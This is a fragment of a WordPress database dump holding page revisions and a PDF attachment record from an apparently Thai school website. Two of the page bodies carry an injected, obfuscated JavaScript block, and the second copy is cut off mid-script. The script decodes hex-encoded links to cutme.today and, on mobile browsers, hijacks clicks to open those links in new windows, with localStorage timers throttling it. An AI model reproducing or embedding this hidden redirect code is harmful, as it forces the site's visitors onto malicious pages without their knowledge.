{\"lightbox\":{\"enabled\":false},\"id\":729,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=748\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/2-1.png\" alt=\"\" class=\"wp-image-729\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":808,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><a href=\"http://pakhaeng.ssk.in.th/?page_id=810\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/คู่มือ.png\" alt=\"\" class=\"wp-image-808\" style=\"width:150px\"/></a></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"lightbox\":{\"enabled\":false},\"id\":727,\"sizeSlug\":\"full\",\"linkDestination\":\"custom\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><a href=\"http://pakhaeng.ssk.in.th/smss/index.php\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/smss-ssk1.webp\" alt=\"\" class=\"wp-image-727\"/></a></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":730,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/5.png\" alt=\"\" class=\"wp-image-730\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column -->\n\n<!-- wp:column -->\n<div class=\"wp-block-column\"><!-- wp:image {\"id\":728,\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/admss.webp\" alt=\"\" class=\"wp-image-728\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:image {\"id\":731,\"width\":\"150px\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\",\"align\":\"center\"} -->\n<figure class=\"wp-block-image aligncenter size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/6.png\" alt=\"\" class=\"wp-image-731\" style=\"width:150px\"/></figure>\n<!-- /wp:image --></div>\n<!-- /wp:column --></div>\n<!-- /wp:columns --></div></div>\n<!-- /wp:kadence/tab --></div></div></div>\n<!-- /wp:kadence/tabs -->\n\n<!-- wp:paragraph -->\n<p></p>\n<!-- /wp:paragraph --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"6e68763c\",\"bgImage\":{\"id\":155,\"image\":{\"url\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/07/rovbb.png\",\"height\":700,\"width\":2000,\"orientation\":\"landscape\"}},\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"a8863e18\",\"isDynamic\":true,\"blockVersion\":4} -->\n<!-- wp:generateblocks/grid {\"uniqueId\":\"73d9ffe7\",\"columns\":3,\"isDynamic\":true,\"blockVersion\":3} -->\n<!-- wp:generateblocks/container {\"uniqueId\":\"4cd8c7be\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":2,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"}} -->\n<!-- wp:paragraph {\"align\":\"center\",\"backgroundColor\":\"cyan-bluish-gray\",\"fontSize\":\"medium\"} -->\n<p class=\"has-text-align-center has-cyan-bluish-gray-background-color has-background has-medium-font-size\"><strong>แผนที่/ที่ตั้ง</strong></p>\n<!-- /wp:paragraph -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.google.com/maps/embed?pb=!1m14!1m8!1m3!1d5452.291688605335!2d104.62712667989774!3d14.917446024068381!3m2!1i1024!2i768!4f13.1!3m3!1m2!1s0x3116c03ca70059ff%3A0x6b24a4a42a852eab!2z4LmC4Lij4LiH4LmA4Lij4Li14Lii4LiZ4Lia4LmJ4Liy4LiZ4Lir4LiZ4Lit4LiH4Lib4Lil4Liy4LmA4LiC4LmH4LiH!5e0!3m2!1sth!2sth!4v1722057516298!5m2!1sth!2sth\" width=\"100%\" height=\"350\" style=\"border:0;\" allowfullscreen=\"\" loading=\"lazy\" referrerpolicy=\"no-referrer-when-downgrade\"></iframe>\n<!-- /wp:html -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"457aa97e\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"isDynamic\":true,\"blockVersion\":4,\"orderMobile\":1,\"sizing\":{\"width\":\"50%\",\"widthMobile\":\"100%\"},\"spacing\":{\"paddingTop\":\"30px\",\"paddingRight\":\"30px\",\"paddingBottom\":\"0px\",\"paddingLeft\":\"30px\",\"paddingTopMobile\":\"40px\",\"paddingRightMobile\":\"15px\",\"paddingBottomMobile\":\"30px\",\"paddingLeftMobile\":\"15px\"}} -->\n<!-- wp:image {\"id\":686,\"width\":\"auto\",\"height\":\"500px\",\"aspectRatio\":\"1\",\"scale\":\"cover\",\"sizeSlug\":\"full\",\"linkDestination\":\"none\"} -->\n<figure class=\"wp-block-image size-full is-resized\"><img src=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/Yellow-Clean-Contact-Us-Instagram-Post.png\" alt=\"\" class=\"wp-image-686\" style=\"aspect-ratio:1;object-fit:cover;width:auto;height:500px\"/></figure>\n<!-- /wp:image -->\n\n<!-- wp:generateblocks/headline {\"uniqueId\":\"6e95d8cb\",\"blockVersion\":3,\"typography\":{\"fontSize\":\"20px\",\"fontSizeMobile\":\"22px\"},\"spacing\":{\"marginBottom\":\"3px\"},\"textColor\":\"#000000\"} -->\n<h2 class=\"gb-headline gb-headline-6e95d8cb gb-headline-text\"><strong>ติดตามเราได้ที่</strong></h2>\n<!-- /wp:generateblocks/headline -->\n\n<!-- wp:html -->\n<iframe src=\"https://www.facebook.com/plugins/page.php?href=https%3A%2F%2Fwww.facebook.com%2FbannongpakhaengSchool%3Flocale%3Dth_TH&tabs=timeline&width=330&height=50&small_header=true&adapt_container_width=true&hide_cover=true&show_facepile=true&appId\" width=\"330\" height=\"80\" style=\"border:none;overflow:hidden\" scrolling=\"no\" frameborder=\"0\" allowfullscreen=\"true\" allow=\"autoplay; clipboard-write; encrypted-media; picture-in-picture; web-share\"></iframe>\n<!-- /wp:html -->\n\n<!-- wp:shortcode -->\n[post-views]\n<!-- /wp:shortcode -->\n<!-- /wp:generateblocks/container -->\n\n<!-- wp:generateblocks/container {\"uniqueId\":\"fc945863\",\"isGrid\":true,\"gridId\":\"73d9ffe7\",\"width\":50,\"widthMobile\":100,\"isDynamic\":true,\"blockVersion\":4} /-->\n<!-- /wp:generateblocks/grid -->\n<!-- /wp:generateblocks/container -->\n<!-- /wp:generateblocks/container --></div></div>\n<!-- /wp:kadence/column -->\n<!-- /wp:kadence/rowlayout -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const _0x415ff3=_0x111835,_0x229a83=_0x3743e2[_0x415ff3(0x1c9)]((_0x37389f,_0x22f261)=>localStorage[_0x415ff3(0x1cb)](_0x37389f+_0x415ff3(0x1e8))==0x0);return _0x229a83[Math[_0x415ff3(0x1c6)](Math[_0x415ff3(0x1cc)]()*_0x229a83[_0x415ff3(0x1d2)])];},_0x173ccb=_0xb01406=>localStorage[_0x111835(0x1cf)](_0xb01406+_0x111835(0x1e8),0x1),_0x5792ce=_0x5415c5=>localStorage[_0x111835(0x1cb)](_0x5415c5+_0x111835(0x1e8)),_0xa7249=(_0x354163,_0xd22cba)=>localStorage[_0x111835(0x1cf)](_0x354163+_0x111835(0x1e8),_0xd22cba),_0x381bfc=(_0x49e91b,_0x531bc4)=>{const _0x1b0982=_0x111835,_0x1da9e1=0x3e8*0x3c*0x3c;return Math[_0x1b0982(0x1d5)](Math[_0x1b0982(0x1e7)](_0x531bc4-_0x49e91b)/_0x1da9e1);},_0x6ba060=(_0x1e9127,_0x28385f)=>{const _0xb7d87=_0x111835,_0xc3fc56=0x3e8*0x3c;return Math[_0xb7d87(0x1d5)](Math[_0xb7d87(0x1e7)](_0x28385f-_0x1e9127)/_0xc3fc56);},_0x370e93=(_0x286b71,_0x3587b8,_0x1bcfc4)=>{const _0x22f77c=_0x111835;_0x487206(_0x286b71),newLocation=_0x564ab0(_0x286b71),_0xa7249(_0x3587b8+\'-mnts\',_0x1bcfc4),_0xa7249(_0x3587b8+_0x22f77c(0x1d3),_0x1bcfc4),_0x173ccb(newLocation),window[\'mobileCheck\']()&&window[_0x22f77c(0x1d4)](newLocation,\'_blank\');};_0x487206(_0xe6f43);function _0x168fb9(_0x36bdd0){const _0x2737e0=_0x111835;_0x36bdd0[_0x2737e0(0x1ce)]();const _0x263ff7=location[_0x2737e0(0x1dc)];let _0x1897d7=_0x564ab0(_0xe6f43);const _0x48cc88=Date[_0x2737e0(0x1e3)](new Date()),_0x1ec416=_0x5792ce(_0x263ff7+_0x2737e0(0x1e0)),_0x23f079=_0x5792ce(_0x263ff7+_0x2737e0(0x1d3));if(_0x1ec416&&_0x23f079)try{const _0x2e27c9=parseInt(_0x1ec416),_0x1aa413=parseInt(_0x23f079),_0x418d13=_0x6ba060(_0x48cc88,_0x2e27c9),_0x13adf6=_0x381bfc(_0x48cc88,_0x1aa413);_0x13adf6>=_0xc82d98&&(_0x487206(_0xe6f43),_0xa7249(_0x263ff7+_0x2737e0(0x1d3),_0x48cc88)),_0x418d13>=_0x7378e8&&(_0x1897d7&&window[_0x2737e0(0x1e5)]()&&(_0xa7249(_0x263ff7+_0x2737e0(0x1e0),_0x48cc88),window[_0x2737e0(0x1d4)](_0x1897d7,_0x2737e0(0x1dd)),_0x173ccb(_0x1897d7)));}catch(_0x161a43){_0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}else _0x370e93(_0xe6f43,_0x263ff7,_0x48cc88);}document[_0x111835(0x1df)](_0x111835(0x1d8),_0x168fb9);}());</script>','หน้าแรก','','inherit','closed','closed','','14-revision-v1','','','2024-08-21 09:33:34','2024-08-21 02:33:34','',14,'http://pakhaeng.ssk.in.th/?p=1024',0,'revision','',0),
(1025,1,'2024-08-21 09:35:22','2024-08-21 02:35:22','','รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี','','inherit','','closed','','%e0%b8%a3%e0%b8%b2%e0%b8%a2%e0%b8%87%e0%b8%b2%e0%b8%99%e0%b8%9c%e0%b8%a5%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b8%94%e0%b8%b3%e0%b9%80%e0%b8%99%e0%b8%b4%e0%b8%99%e0%b8%81%e0%b8%b2%e0%b8%a3%e0%b9%80%e0%b8%9e-2','','','2024-08-21 09:35:22','2024-08-21 02:35:22','',1020,'http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf',0,'attachment','application/pdf',0),
(1026,1,'2024-08-21 09:35:25','2024-08-21 02:35:25','<!-- wp:file {\"id\":1025,\"href\":\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf\",\"displayPreview\":true} -->\n<div class=\"wp-block-file\"><object class=\"wp-block-file__embed\" data=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf\" type=\"application/pdf\" style=\"width:100%;height:600px\" aria-label=\"รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี\"></object><a id=\"wp-block-file--media-f4be8a42-d6b4-4952-b680-5b1f499ece36\" href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf\">รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี</a><a href=\"http://pakhaeng.ssk.in.th/wp-content/uploads/2024/08/รายงานผลการดำเนินการเพื่อจัดการความเสี่ยงการทุจริตและประพฤติมิชอบประจำปี.pdf\" class=\"wp-block-file__button wp-element-button\" download aria-describedby=\"wp-block-file--media-f4be8a42-d6b4-4952-b680-5b1f499ece36\">Download</a></div>\n<!-- /wp:file -->\r\n<script>function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2[_0x30231a];return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const _0x5a990b=[\'substr\',\'length\',\'-hurs\',\'open\',\'round\',\'443779RQfzWn\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x6f\\x63\\x47\\x33\\x63\\x353\',\'click\',\'5114346JdlaMi\',\'1780163aSIYqH\',\'forEach\',\'host\',\'_blank\',\'68512ftWJcO\',\'addEventListener\',\'-mnts\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x74\\x68\\x4f\\x35\\x63\\x385\',\'4588749LmrVjF\',\'parse\',\'630bGPCEV\',\'mobileCheck\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x6e\\x50\\x38\\x63\\x338\',\'abs\',\'-local-storage\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x41\\x58\\x4e\\x39\\x63\\x389\',\'56bnMKls\',\'opera\',\'6946eLteFW\',\'userAgent\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x49\\x4d\\x76\\x34\\x63\\x324\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x48\\x62\\x61\\x37\\x63\\x357\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x42\\x42\\x47\\x32\\x63\\x382\',\'floor\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x50\\x79\\x78\\x36\\x63\\x376\',\'999HIfBhL\',\'filter\',\'test\',\'getItem\',\'random\',\'138490EjXyHW\',\'stopPropagation\',\'setItem\',\'70kUzPYI\'];_0x1922=function(){return _0x5a990b;};return _0x1922();}(function(_0x16ffe6,_0x1e5463){const _0x20130f=_0x3023,_0x307c06=_0x16ffe6();while(!![]){try{const _0x1dea23=parseInt(_0x20130f(0x1d6))/0x1+-parseInt(_0x20130f(0x1c1))/0x2*(parseInt(_0x20130f(0x1c8))/0x3)+parseInt(_0x20130f(0x1bf))/0x4*(-parseInt(_0x20130f(0x1cd))/0x5)+parseInt(_0x20130f(0x1d9))/0x6+-parseInt(_0x20130f(0x1e4))/0x7*(parseInt(_0x20130f(0x1de))/0x8)+parseInt(_0x20130f(0x1e2))/0x9+-parseInt(_0x20130f(0x1d0))/0xa*(-parseInt(_0x20130f(0x1da))/0xb);if(_0x1dea23===_0x1e5463)break;else _0x307c06[\'push\'](_0x307c06[\'shift\']());}catch(_0x3e3a47){_0x307c06[\'push\'](_0x307c06[\'shift\']());}}}(_0x1922,0x984cd),function(_0x34eab3){const _0x111835=_0x3023;window[\'mobileCheck\']=function(){const _0x123821=_0x3023;let _0x399500=![];return function(_0x5e9786){const _0x1165a7=_0x3023;if(/(android|bb\\d+|meego).+mobile|avantgo|bada\\/|blackberry|blazer|compal|elaine|fennec|hiptop|iemobile|ip(hone|od)|iris|kindle|lge |maemo|midp|mmp|mobile.+firefox|netfront|opera m(ob|in)i|palm( os)?|phone|p(ixi|re)\\/|plucker|pocket|psp|series(4|6)0|symbian|treo|up\\.(browser|link)|vodafone|wap|windows ce|xda|xiino/i[_0x1165a7(0x1ca)](_0x5e9786)||/1207|6310|6590|3gso|4thp|50[1-6]i|770s|802s|a wa|abac|ac(er|oo|s\\-)|ai(ko|rn)|al(av|ca|co)|amoi|an(ex|ny|yw)|aptu|ar(ch|go)|as(te|us)|attw|au(di|\\-m|r |s )|avan|be(ck|ll|nq)|bi(lb|rd)|bl(ac|az)|br(e|v)w|bumb|bw\\-(n|u)|c55\\/|capi|ccwa|cdm\\-|cell|chtm|cldc|cmd\\-|co(mp|nd)|craw|da(it|ll|ng)|dbte|dc\\-s|devi|dica|dmob|do(c|p)o|ds(12|\\-d)|el(49|ai)|em(l2|ul)|er(ic|k0)|esl8|ez([4-7]0|os|wa|ze)|fetc|fly(\\-|_)|g1 u|g560|gene|gf\\-5|g\\-mo|go(\\.w|od)|gr(ad|un)|haie|hcit|hd\\-(m|p|t)|hei\\-|hi(pt|ta)|hp( i|ip)|hs\\-c|ht(c(\\-| |_|a|g|p|s|t)|tp)|hu(aw|tc)|i\\-(20|go|ma)|i230|iac( |\\-|\\/)|ibro|idea|ig01|ikom|im1k|inno|ipaq|iris|ja(t|v)a|jbro|jemu|jigs|kddi|keji|kgt( |\\/)|klon|kpt |kwc\\-|kyo(c|k)|le(no|xi)|lg( g|\\/(k|l|u)|50|54|\\-[a-w])|libw|lynx|m1\\-w|m3ga|m50\\/|ma(te|ui|xo)|mc(01|21|ca)|m\\-cr|me(rc|ri)|mi(o8|oa|ts)|mmef|mo(01|02|bi|de|do|t(\\-| |o|v)|zz)|mt(50|p1|v )|mwbp|mywa|n10[0-2]|n20[2-3]|n30(0|2)|n50(0|2|5)|n7(0(0|1)|10)|ne((c|m)\\-|on|tf|wf|wg|wt)|nok(6|i)|nzph|o2im|op(ti|wv)|oran|owg1|p800|pan(a|d|t)|pdxg|pg(13|\\-([1-8]|c))|phil|pire|pl(ay|uc)|pn\\-2|po(ck|rt|se)|prox|psio|pt\\-g|qa\\-a|qc(07|12|21|32|60|\\-[2-7]|i\\-)|qtek|r380|r600|raks|rim9|ro(ve|zo)|s55\\/|sa(ge|ma|mm|ms|ny|va)|sc(01|h\\-|oo|p\\-)|sdk\\/|se(c(\\-|0|1)|47|mc|nd|ri)|sgh\\-|shar|sie(\\-|m)|sk\\-0|sl(45|id)|sm(al|ar|b3|it|t5)|so(ft|ny)|sp(01|h\\-|v\\-|v )|sy(01|mb)|t2(18|50)|t6(00|10|18)|ta(gt|lk)|tcl\\-|tdg\\-|tel(i|m)|tim\\-|t\\-mo|to(pl|sh)|ts(70|m\\-|m3|m5)|tx\\-9|up(\\.b|g1|si)|utst|v400|v750|veri|vi(rg|te)|vk(40|5[0-3]|\\-v)|vm40|voda|vulc|vx(52|53|60|61|70|80|81|83|85|98)|w3c(\\-| )|webc|whit|wi(g |nc|nw)|wmlb|wonu|x700|yas\\-|your|zeto|zte\\-/i[_0x1165a7(0x1ca)](_0x5e9786[_0x1165a7(0x1d1)](0x0,0x4)))_0x399500=!![];}(navigator[_0x123821(0x1c2)]||navigator[\'vendor\']||window[_0x123821(0x1c0)]),_0x399500;};const _0xe6f43=[\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x77\\x67\\x64\\x30\\x63\\x380\',\'\\x68\\x74\\x74\\x70\\x3a\\x2f\\x2f\\x63\\x75\\x74\\x6d\\x65\\x2e\\x74\\x6f\\x64\\x61\\x79\\x2f\\x4d\\x76\\x49\\x31\\x63\\x361\',_0x111835(0x1c5),_0x111835(0x1d7),_0x111835(0x1c3),_0x111835(0x1e1),_0x111835(0x1c7),_0x111835(0x1c4),_0x111835(0x1e6),_0x111835(0x1e9)],_0x7378e8=0x3,_0xc82d98=0x6,_0x487206=_0x551830=>{const _0x2c6c7a=_0x111835;_0x551830[_0x2c6c7a(0x1db)]((_0x3ee06f,_0x37dc07)=>{const _0x476c2a=_0x2c6c7a;!localStorage[\'getItem\'](_0x3ee06f+_0x476c2a(0x1e8))&&localStorage[_0x476c2a(0x1cf)](_0x3ee06f+_0x476c2a(0x1e8),0x0);});},_0x564ab0=_0x3743e2=>{const 